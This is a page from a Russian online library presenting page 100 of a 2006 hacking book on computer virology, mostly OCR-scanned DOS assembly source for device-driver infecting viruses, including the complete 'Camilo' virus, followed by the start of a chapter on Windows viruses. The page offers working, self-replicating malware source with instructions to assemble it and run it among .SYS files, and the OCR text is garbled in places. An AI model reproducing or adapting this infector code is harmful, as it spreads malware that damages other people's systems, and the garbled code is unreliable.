Книги
чёрным по белому
Главное меню
Главная О нас Добавить материал Поиск по сайту Карта книг Карта сайта
Книги
Археология Архитектура Бизнес Биология Ветеринария Военная промышленность География Геология Гороскоп Дизайн Журналы Инженерия Информационные ресурсы Искусство История Компьютерная литература Криптология Кулинария Культура Лингвистика Математика Медицина Менеджмент Металлургия Минералогия Музыка Научная литература Нумизматика Образование Охота Педагогика Политика Промышленные производства Психология Путеводители Религия Рыбалка Садоводство Саморазвитие Семиотика Социология Спорт Столярное дело Строительство Техника Туризм Фантастика Физика Футурология Химия Художественная литература Экология Экономика Электроника Энергетика Этика Юриспруденция
Новые книги
Цуканов Б.И. "Время в психике человека" (Медицина)

Суворов С. "Танк Т-64. Первенец танков 2-го поколения " (Военная промышленность)

Нестеров В.А. "Основы проэктирования ракет класса воздух- воздух и авиационных катапульных установок для них" (Военная промышленность)

Фогль Б. "101 вопрос, который задала бы ваша кошка своему ветеринару если бы умела говорить" (Ветеринария)

Яблоков Н.П. "Криминалистика" (Юриспруденция)
Реклама

Азбука хакера 3. Компьютерная вирусология - Собейкис В.Г.

Собейкис В.Г. Азбука хакера 3. Компьютерная вирусология — М.: Майор, 2006. — 512 c.
ISBN 5-98551-013-1
Скачать (прямая ссылка): hakeriazbukahakera2006.djvu
Предыдущая << 1 .. 94 95 96 97 98 99 < 100 > 101 102 103 104 105 106 .. 123 >> Следующая

инфекцию mov [di,OFFSET STRJMP],ax
mov ah,40H записываем вирус в конец файла mov сх,OFFSET END_VIRUS -
OFFSET VIRUS lea dx, [di+OFFSET VIRUS] int 21H
pop ax восстанавливаем STRJMP для этого
mov [di+OFFSET STRJMP],ax ;типа вируса mov ax,4200H ;ищем адрес STRAT
xor cx.cx ;в офсете 6 от начала файла mov dx,6 int 21 h
pop ax -.восстанавливаем оригинальный конец файла mov WORD PTR [dHOFFSET
FlLEBUF],ax ;сохранЯем для новой точки ; входа STRAT
mov ah, 40H записываем новую точку входа STRAT lea dx, [di+OFFSET
FILEBUF] ;для инфицирования файла mov сх,2 int 21 h
IFCLOSE:
mov ah,3EH закрываем файл
int 21 h
pop bx ;и выходим
ret
ГЛАВА в. Инфицирование драйверов устройств
STRJMP DW OFFSET STRAT
CSYS DB CONFIG.SYS',0
UNEBUF DB 129 dup (0)
FILEBUF DB 20 dup (0)
END VIRUS:
END STRAT
И далее в качестве дополнительного примера я предлагаю вам разобрать
исходный код вируса Camilo, написанный int 13h. Чтобы ассемблировать код,
произведите:
tasm camjlo.asm /m3 tlink camilo
Далее выполните программу Camilo.exe в директории, где размещены какие-
либо .SYS-файлы.
.model tiny .code jumps org О
VirusSize equ offset Heap-offset Camilo
Camilo: db 0b8h ;mov ax,офсет подпрограммы оригинальной ; стратегии
Vieja_Estrategica dw О
push ах ; вталкиваем адрес, затем прыгаем с помощью RET
push bx сх dx si di bp ds es push cs cs
pop ds es ;DS=CS
call Delta
Delta:popdi ; получаем дельта-офсет
sub di,offset Delta
mov ah,02fh
сохраняем оригинальную DTA
Варфоломей Собейкис. АЗБУКА ХАКЕРА-3
int 021h
mov word ptr [di+OriginalDTA] ,bx mov word ptr [di+OriginalDTA+2],es mov
ah,01 ah устанавливаем собственную DTA lea dx,[di+offset ViralDTA] int
021h
movah,04eh ;осматриваем все .SYS-файлы в текущей директории хог сх.сх
lea dx,[di+offset Victims] int 021h jc PopThem
Verify: mov ax,03d02h '.открываем найденный файл lea dx,[di+offset
ViralDTA+01eh] int 021h xchg bx.ax
mov ah,03fh ;читаем 10 байтов
lea dx,[di+offset Buffer] movcx,10d int 021 h
i
mov si.dx
mov ax.word ptr [si]
cmp ax.'ZM' ;SYS с .ЕХЕ-заголовком? je Close
inc ax ; проверяем, имеет ли заголовок значение Qxffff jnz Close ;и
смотрим, единственное ли это устройство в файле mov ax,05700h ;
получаем дату и время
int 021h
mov word ptr [di+Fecha] ,dx mov word ptr [di+Hora],cx and cl.00011111b
cmp cl.00011110b ;30*2= 60? ищем знак инфекции je Close
ГЛАВА 8. Инфицирование драйверов устройств
mov ax,04202h ;перемещаем указатель на EOF
sub сх,сх cwd int 021h
mov cx.word ptr [si+6] сохраняем подпрограмму
оригинальной стратегии
mov word ptr [di+Vieja_Estrategica],cx указываем
подпрограмме стратегии
;на код вируса в EOF (значение ах)
mov word ptr [di+offset buffer+6],ax
mov ah,040h ;прикрепляем вирус к файлу
mov cx.VirusSize lea dx,[di+offset Camilo] int 021h
mov ax,04200h указатель на начало
xor cx.cx cwd int 021h
movah,040h ;записываем модифицированный заголовок movcx,10
lea dx,[di+offset Buffer] int 021h
mov ax,05701 h ; восстанавливаем дату и время
db Obah
Fecha dw 0
db 0b9h
Hora dw 0
and cl,11100000b ;штамп времени как инфицированный or cl,00011110b
устанавливаем секунды=30*2=60! int 021h
Варфоломей Собейкис. АЗБУКА ХАКЕРА-3
Close: mov ah,03eh {закрываем зараженный файл int 021h
mov ah ,04fh {вызываем следующую жертву int 021 h jne Verify
PopThem:mov ah,01 ah {восстанавливаем оригинальную DTA Ids dword ptr
dx,[di+offset OriginalDTA] int 021 h
pop es ds bp di si dx cx bx xor ax,ax
ret {прыгаем к подпрограмме оригинальной стратегии
Buffer db10dup(0) {читаем здесь заголовок
{посвящается Camilo Jos - гениальному испанскому писателю VirusName db'
[CAMILO by Inti 3h]
Victims db '*.sys',0 {файлы для инфицирования
HEAP label byte {конец вируса в файле
OriginalDTA dd 0 {адрес старой DTA address
ViralDTA db 43 dup (0) {чтобы использовать его в функциях {Find
first/next
End Camilo
Глава 9. Вирусы под Windows
Прежде чем говорить о вирусах под Windows, имеет смысл вспомнить, а для
чего вообще была нужна сама Windows? Ну же, напрягите свои
интеллектуальные способности и дайте себе отчет - программа Windows
потребовалась для того, чтобы научить любого идиота пользоваться
компьютером. Посудите сами: для того, чтобы работать в DOS надо было быть
по меньшей мере аналитически мыслящим человеком. Для того, чтобы
разобраться в Norton Commander (сейчас его функции исполняют Far, Windows
Commander, Volkov Commander - этих последышей полным-полно, а сам дедушка
командор Norton ушел в свой мир утилит и антивирусов, да будет
виртуальная земля виртуальным прахом его памяти), и вообще при общении с
любым Коммандером требовалось обладать хотя бы азами логического
мышления. Для работы же с Windows головы вообще не требуется, достаточно
иметь пару рук - одной держаться за джойстик, а другой кидать в рот
семечки. Мудрость Билла Гейтса и состояла в том, что он просчитал
соотношение умных людей и идиотов среди населения Земли и понял, что
вторых - подавляющее большинство и деньжата водятся именно у них.
Предыдущая << 1 .. 94 95 96 97 98 99 < 100 > 101 102 103 104 105 106 .. 123 >> Следующая